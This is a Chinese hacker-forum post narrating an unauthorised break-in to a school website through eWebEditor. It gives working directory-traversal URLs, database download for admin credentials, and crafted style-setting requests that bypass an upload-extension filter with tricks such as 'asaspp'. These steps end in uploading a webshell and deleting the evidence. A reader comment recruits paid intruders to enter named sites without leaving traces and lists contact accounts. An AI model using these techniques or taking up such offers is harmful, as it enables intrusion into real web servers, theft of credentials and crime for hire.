ewebeditor无后台另类拿站

2010, December 15, 10:47 PM. 黑友网文
Submitted by admin

文章作者:yeshu

昨天很无聊,没事做就跑去检测同学学校的.

打开网站,找了下没找到..
-0看看有没有cookie注入也米用.都堵住了
图-1

大小: 25.64 K
尺寸: 393 x 183
浏览: 55 次
点击打开新窗口浏览全图

找后台
http://www.xxxx.com/admin/admin_login.asp
试了下admin admin888
'or'='or'都没用
网上查了下这站也没有旁站
于是在看看网站图片属性
图-2

大小: 17.04 K
尺寸: 374 x 242
浏览: 59 次
点击打开新窗口浏览全图

发现有ewebeditor
打开http://www.xxxx.com/admin/ewebeditor/admin_login.asp
图-3


大小: 46.82 K
尺寸: 433 x 324
浏览: 47 次
点击打开新窗口浏览全图

发现后台被删了
在打开http://www.xxxx.com/admin/ewebeditor/db/ewebeditor.mdb
发现存在数据库,并下载
但打开数据库看后,没发现前辈留下的脚印
现在后台被删了,有没脚印于是想看看能否直接进后台样式
http://www.xxxx.com/admin/ewebeditor/admin_style.asp
图-4


大小: 93.41 K
尺寸: 500 x 348
浏览: 57 次
点击打开新窗口浏览全图

直接进去了
但是我想直接在上面新增样式,却没用会跳转到admin_login.asp页面
图-5


大小: 51.33 K
尺寸: 500 x 332
浏览: 40 次
点击打开新窗口浏览全图

郁闷了,不过想想既然可以直接这样输入地址进入样式管理项目,那试试可不可以直接输入上传文件管理的地方,这样就可以来遍历目录了
于是输入http://www.xxxx.com/admin/ewebeditor/admin_uploadfile.asp?id=22 成功进入
再继续来遍历目录了
http://www.xxxx.com/admin/ewebeditor/admin_uploadfile.asp?id=22&dir=../../..
图-6


大小: 55.61 K
尺寸: 500 x 326
浏览: 49 次
点击打开新窗口浏览全图

继续遍历data目录
http://www.xxxx.com/admin/ewebeditor/admin_uploadfile.asp?id=22&dir=../../../data
(注意这里想遍历目录得自己手动在url上加上目录名才可以,若直接点网页上的链接浏览的话会直接跳转到admin_login.asp页面)
发现了数据库并下载得到后台账号密码
成功进入后台,但进后台后没发现可以利用的地方....遂放弃
再转战ewebeditor
继续看前面ewebedior是否还有利用的地方
前面在网页上点“添加样式”会跳到admin_login.asp,不知道为什么会这样?
然后就想先在自己电脑上的ewebeditor里面添加样式抓包,再把抓到的数据包改改地址给发送到目标网站上去,
结果测试nc提交后仍然会提示跳转到admin_login.asp


d_name=888&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=600&d_height=400&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=UploadFile%2F&d_basehref=http%3A%2F%2FLocalhost%2FeWebEditor%2F&d_contentpath=UploadFile%2F&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7Casa&d_imagesize=100&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cbmp&d_remotesize=100&d_memo=&x=29&y=14

想不通了..
最后再想想前面这个遍历目录时非得在url后面添加才可以浏览,那不相当于利用get方法提交数据么,难道这只能利用get方法提交才不会跳转到admin_login.asp页面
于是想着直接利用在网站上url上添加数据提交来直接添加样式
但至于怎么url我也不清楚,只知道抓包得到的

这个是要传递的数据
于是自己在本机上乱来,测试呗,

结果发现直接

http://www.xxxx.com/admin/ewebeditor/action=StyleAddSave&id=88&d_name=888&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=600&d_height=400&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=UploadFile%2F&d_basehref=http%3A%2F%2FLocalhost%2FeWebEditor%2F&d_contentpath=UploadFile%2F&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7Casa&d_imagesize=100&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cbmp&d_remotesize=100&d_memo=&x=29&y=14

这样就可以成功添加个样式,并且上传图片的格式可以是asa的。
图-7


大小: 68.95 K
尺寸: 481 x 415
浏览: 43 次
点击打开新窗口浏览全图

但接下来又卡住了..
本来添加样式后就是添加栏了,
但自己在本机用同上的方法怎么测试,都不成功,郁闷了…
没办法了,但看看网站默认样式后面有个拷贝的选项
于是想着利用上面的方法拷贝个样式
然后再设置此样式里面的图片允许上传asa格式..,这样就好了,不用我自己来添加工具栏了
于是本机拷贝抓包发现提交http://www.xxxx.com/admin/ewebeditor/admin_style.asp?action=copy&id=14即可拷贝成功
图-8


大小: 76.4 K
尺寸: 500 x 352
浏览: 44 次
点击打开新窗口浏览全图

再继续本机在拷贝得到的样式里面添加asa样式抓包获取提交数据
再构造url
http://www.xxxx.com/admin/ewebeditor/admin_style.asp?action=StyleSetSave&id=48&d_name=standard1&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=550&d_height=350&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=UploadFile%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7Casa&d_imagesize=100&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cjpeg%7Cbmp&d_remotesize=100&d_memo=Office%B1%EA%D7%BC%B7%E7%B8%F1%A3%AC%B2%BF%B7%D6%B3%A3%D3%C3%B0%B4%C5%A5%A3%AC%B1%EA%D7%BC%CA%CA%BA%CF%BD%E7%C3%E6%BF%ED%B6%C8%A3%AC%C4%AC%C8%CF%D1%F9%CA%BD&x=39&y=9

成功在样式图片里面添加了asa格式

http://www.xxxx.com/admin/ewebedito/

admin_style.asp?action=stylepreview&id=53预览此样式
打开上传图片的地方却发现还是不能上传asa格式文件
晕了,后台里明明现实可以提交asa格式的..
难道做了这么多,全是在自慰,只能看不能用的。。
火了,再用此方法,在自己电脑上测试却发现能行的通呀…
……………..
再跑去网站上看看那样式预览的结果,
Tmd的看了十几篇突然发现个问题..
这里面的gifjpgjpegbmp后面多了个 ""
图-9 10

大小: 31.41 K
尺寸: 345 x 242
浏览: 51 次
点击打开新窗口浏览全图大小: 31.87 K
尺寸: 348 x 243
浏览: 50 次
点击打开新窗口浏览全图

然后想到会不是会管理员给过滤了asp了,
于是速度跑去用上面方法添加cer格式看看,发现也这样,可能也被过滤了
继续添加asaspp样式,过滤后asp后就剩下asp了
ok终于成功了
图-11


大小: 71.01 K
尺寸: 465 x 425
浏览: 68 次
点击打开新窗口浏览全图

成功上传小马
图-12


大小: 54.83 K
尺寸: 490 x 241
浏览: 48 次
点击打开新窗口浏览全图

最后admin_style.asp?action=styledel&id=55删除刚刚创建的样式 :注意后面的id得自己找对

« 上一篇 | 下一篇 »

只显示10条记录相关文章
SQL注入eWebEditor数据库 (浏览: 9212, 评论: 0)
eWebEditor 2.8 商业版插一句话木马 (浏览: 9611, 评论: 0)
ewebeditor for php任意文件上传漏洞 (浏览: 12181, 评论: 0)
eWebEditor suffers from a directory traversal vulnerability (浏览: 7932, 评论: 0)
ewebeditor 5.2 列目录漏洞 (浏览: 9916, 评论: 0)
Trackbacks
点击获得Trackback地址,Encode: UTF-8 点击获得Trackback地址,Encode: GB2312 or GBK 点击获得Trackback地址,Encode: BIG5
1条记录访客评论

寻找真实有实力的拿站高手,www.hj8828.com www.0691988.com 这两个站,如果你能进出网站后台不留下痕迹,进去截图发我。我们再谈价格,钱你绝对满意,可以长期合作,价格,一天不少于10万,只合作,希望长期的。以前合作的挣的钱满足了,走了,现在找不到人,所以才从新找人合作,不需要见面,每天结账,我微信wcd5201841QQ392188257

Post by Q392188257 on 2016, January 15, 7:09 PM 引用此文发表评论 #1


发表评论

评论内容 (必填):